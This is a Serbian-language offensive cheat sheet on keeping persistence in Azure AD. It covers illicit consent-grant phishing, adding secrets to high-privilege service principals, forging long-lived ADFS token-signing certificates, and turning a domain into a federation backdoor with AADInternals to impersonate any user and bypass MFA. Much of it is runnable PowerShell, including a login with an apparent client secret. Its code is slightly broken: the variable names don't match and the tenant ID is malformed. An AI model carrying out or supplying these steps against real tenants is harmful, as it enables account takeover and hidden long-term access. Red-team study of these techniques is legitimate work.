Az - Persistence

Nezakonito odobrenje pristanka

Podrazumevano, svaki korisnik može registrovati aplikaciju u Azure AD. Dakle, možete registrovati aplikaciju (samo za ciljani tenant) koja zahteva visoko uticajne dozvole sa administrativnim pristankom (odobriti je ako ste administrator) - poput slanja e-pošte u ime korisnika, upravljanja ulogama itd. Ovo će nam omogućiti da izvršimo phishing napade koji bi bili veoma uspešni u slučaju uspeha.

Osim toga, takođe možete prihvatiti tu aplikaciju sa vašim korisnikom kao način održavanja pristupa preko nje.

Aplikacije i servisni principali

Sa privilegijama Administratora aplikacija, GA ili prilagođene uloge sa dozvolama microsoft.directory/applications/credentials/update, možemo dodati akreditive (tajnu ili sertifikat) postojećoj aplikaciji.

Moguće je ciljati aplikaciju sa visokim dozvolama ili dodati novu aplikaciju sa visokim dozvolama.

Interesantna uloga koju možemo dodati aplikaciji je Uloga privilegovanog administratorskog autentifikatora jer omogućava resetovanje lozinke Globalnim administratorima.

Ova tehnika takođe omogućava zaobilaženje MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Za autentifikaciju zasnovanu na sertifikatima

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federacija - Sertifikat za potpisivanje tokena

Sa DA privilegijama na lokalnom AD-u, moguće je kreirati i uvesti novi sertifikat za potpisivanje tokena i sertifikat za dekripciju tokena koji imaju veoma dugotrajnu važnost. Ovo će nam omogućiti da se prijavimo kao bilo koji korisnik čiji ImuutableID znamo.

Pokrenite sledeću komandu kao DA na ADFS serveru(ima) da biste kreirali nove sertifikate (podrazumevana lozinka je 'AADInternals'), dodajte ih u ADFS, onemogućite automatsko rotiranje i restartujte servis:

New-AADIntADFSSelfSignedCertificates

Zatim ažurirajte informacije o sertifikatu sa Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federacija - Pouzdani domen

Sa GA privilegijama na zakupcu, moguće je dodati novi domen (mora biti verifikovan), konfigurisati njegov tip autentifikacije kao Federated i konfigurisati domen da poverava određeni sertifikat (any.sts u narednoj komandi) i izdavača:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Reference

• https://aadinternalsbackdoor.azurewebsites.net/